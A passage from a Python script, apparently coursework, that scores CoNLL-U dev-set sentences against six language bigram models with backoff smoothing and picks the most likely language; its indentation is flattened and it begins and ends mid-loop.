normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang3')
countDevLang3+=1
#print("Done with %d sentences in dev set for Lang 3\n"%(countDevLang3))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev3.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev4):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang4')
countDevLang4+=1
#print("Done with %d sentences in dev set for Lang 4\n"%(countDevLang4))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev4.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev5):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
